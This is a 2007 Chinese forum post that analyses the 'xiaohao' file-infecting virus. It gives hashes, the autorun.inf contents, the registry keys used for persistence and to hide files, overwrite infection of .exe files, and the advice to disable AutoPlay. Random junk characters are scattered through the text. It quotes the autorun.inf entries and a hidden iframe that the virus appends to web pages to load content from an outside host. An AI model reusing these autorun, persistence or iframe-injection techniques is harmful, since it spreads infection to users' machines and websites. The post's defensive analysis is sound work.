|
|
File: C:\Documents and Settings\Administrator\桌面\xiaohao.exe/ k7 S0 S2 `9 |; G# W$ r$ W+ j# {
Size: 12288 bytes8 m8 Z$ p6 o5 K
File Version: 1, 0, 0, 1
$ R( E: S& W$ C4 s0 ?" i: U% [Modified: 2007年8月14日, 21:03:226 r! S: d0 B, L X3 Q
MD5: B50ED06B61CDCF060D0136784999E50C( }; K O9 J" \ s& b) J
SHA1: ADFE561A7E12E6123C2E5E64EAE2308CBD4A79FD) ]9 z3 f9 i' y
CRC32: 5CC1E47A
' w, u9 a5 Z5 Y, R- p' ^加壳方式:UPX * ?# _0 t5 x2 ]- g
病毒运行后:
3 j* b# [% `' b7 h7 g, U1.生成如下文件:* w" s2 k* Z; U; O/ v7 ^8 {9 T
%SystemRoot%\system32\exloroe.exe
4 A5 ^& ~& t, H4 j8 Q" e5 W每个分区下生成一个xiaohao.exe 和autorun.inf
! M+ d8 ?# ~5 r' rautorun.inf内容
1 }; N7 {5 }6 u4 X3 g: ^: T[Autorun]2 }; ~+ U6 a. w/ l$ N2 |
open=Xiaohao.exe0 {- a: q& M3 m7 \9 W" h
shellexecute=Xiaohao.exe3 ]2 [+ o- `& K5 l& j3 J
shell\Auto\command=Xiaohao.exe
7 x0 g" T( l, {7 U5 S2.添加注册表项目, g( H2 y; F$ [6 n3 p' c* R
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}/ c' \& t" `5 Z/ Z5 S9 R& {9 z
指向 %SystemRoot%\system32\exloroe.exe达到开机启动目的+ `& Y9 x. x, x0 t/ q
3.修改注册表键值HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue为0x00000000
% ]# D+ ?7 S. l4 T; s4 P S8 b2 M破坏显示隐藏文件( |" F9 x; n: r: ?: ~% ~# F7 l: }
删除HKU\Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu2
2 K C. m n. O) V从而删除开始菜单中所有的快捷方式7 i/ v/ F4 }* A
4.感染文件4 F# r3 o7 M. i
从系统盘开始 查找所有*.exe的文件 将自身病毒体写入到正常文件中,被感染后的文件图标为一个表示有“浩”字的图标,病毒采取覆盖感染的方式,被感染的+ Y; Y2 v3 e+ f% o! B' C8 r+ w
exe无法修复
( A* q: v; Z# W4 t从系统盘开始 查找所有*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 在其尾部加入代码
0 ?; c: s+ E6 S' e+ C8 a9 h- s<iframe src=http://xiaohao.yona.biz/xiaohao.htm width=0 height=0></iframe>
- P: Y y" t) M3 |* i c+ ^, _# R所有感染的文件的文件名记录在C:\Jilu.txt里面
# [: j/ a! ?5 h: C; v* \% u并将所有未能感染的文件属性变为隐藏
3 ~8 X' S- T% N& r5 ]% [* D1 r% S5 ^5.病毒运行时,所有窗口标题变为“已中毒,X14o-H4o's Virus”
# K. O/ M. m- a p6.系统时间改为2005年1月17日
# J2 v$ w9 Q6 B" b- n3 N0 b病毒作者将其QQ号码和博客公布于互联网上,以此炫耀自己的技术。作者的行为和原先的兔子病毒很相像,为了炫耀。/ A3 A d+ y1 z9 x, Y
由于病毒感染所有exe文件 所以重启以后可能会造成ntoskrnl.exe,ntkrnlpa.exe等核心启动文件被修改从而造成系统启动失败
s% O; x1 W5 `, V; Q如果中了此类病毒 那么几乎等于判了死刑 必须重装系统 而且要将其他盘里面所有的*.exe,*.jsp、*.php、*.aspx、*.asp、*.html、*.htm 文件删掉! K6 l" y6 E5 G+ r' l
希望大家注意如下几点防范此类病毒
6 U4 q: w2 Z* y3 ?% X8 N$ L1.安装还原精灵、冰点还原、雨过天晴等还原软件(没装还软软件的参考下两条)3 b- D% J- E" _: g p* c
2.及时升级杀毒软件,防火墙,一定打全系统补丁* ]9 @: B# t' C0 b
3.禁用U盘等移动设备的自动播放功能:在“开始”菜单的“运行”框中运行“gpedit.msc”命令,在“组策略”找到“计算机配置”和“用户配置”下的“管理模板”功能,打开其中的“系统”菜单中的“关闭自动播放”的设置,在其属性里面选择“已启用”,接着选择“所有驱动器”,最后确定保存即可 |
|
IP卡
狗仔卡
发表于 2007-9-16 09:33:42
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
显身卡
楼主